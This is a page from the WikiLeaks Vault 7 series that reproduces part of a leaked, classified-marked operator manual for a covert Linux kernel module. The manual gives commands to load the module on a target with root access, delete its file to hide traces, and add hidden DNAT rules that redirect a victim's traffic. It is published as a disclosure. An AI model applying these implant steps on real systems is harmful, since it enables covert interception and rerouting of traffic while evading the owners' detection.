Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.

SECRET//NOFORN
4. (U) Operation
(S//NF) For operational use, shell access is assumed, and root privileges are required.
4.1 (U) Installation
(S//NF) First, select the appropriate kernel module for the target system. For 64-bit
CentOS/RHEL 6.x targets, use the “nf_table_6_64.ko” module. Copy the module to the
target system, preferably with “nf_table.ko” as the file name.
(S//NF) Make sure that the target has a “nat” table:
TARG# iptables -t nat -L -nv
(S//NF) Load the module using “insmod”:
TARG# insmod nf_table.ko
(S//NF) The new “dpxvke8h18” table should now be loaded:
TARG# iptables -t dpxvke8h18 -L -nv
(S//NF) At this point, the module file on disk can safely be removed for operational
security:
TARG# rm nf_table.ko
4.2 (U) Use
(S//NF) The “dpxvke8h18” table has a PREROUTING chain that supports DNAT
(Destination Network Address Translation) rules, which can be added with the “-A” or “-
I” options available in the “iptables” command:
TARG# iptables -t dpxvke8h18 -A PREROUTING \
-p tcp -s 1.1.1.1 -d 2.2.2.2 --dport 33 \
-j DNAT --to-destination 4.4.4.4:55
(S//NF) The example above applies to TCP traffic from IP 1.1.1.1 that is bound for IP
2.2.2.2, port 33. The traffic is redirected to IP 4.4.4.4, port 55. For more information
about iptables and DNAT rules, consult the iptables man pages.
(S//NF) Current rules can be listed using the “iptables -L” command:
4
SECRET//NOFORN

e-Highlighter

Click to send permalink to address bar, or right-click to copy permalink.

Un-highlight all Un-highlight selectionu Highlight selectionh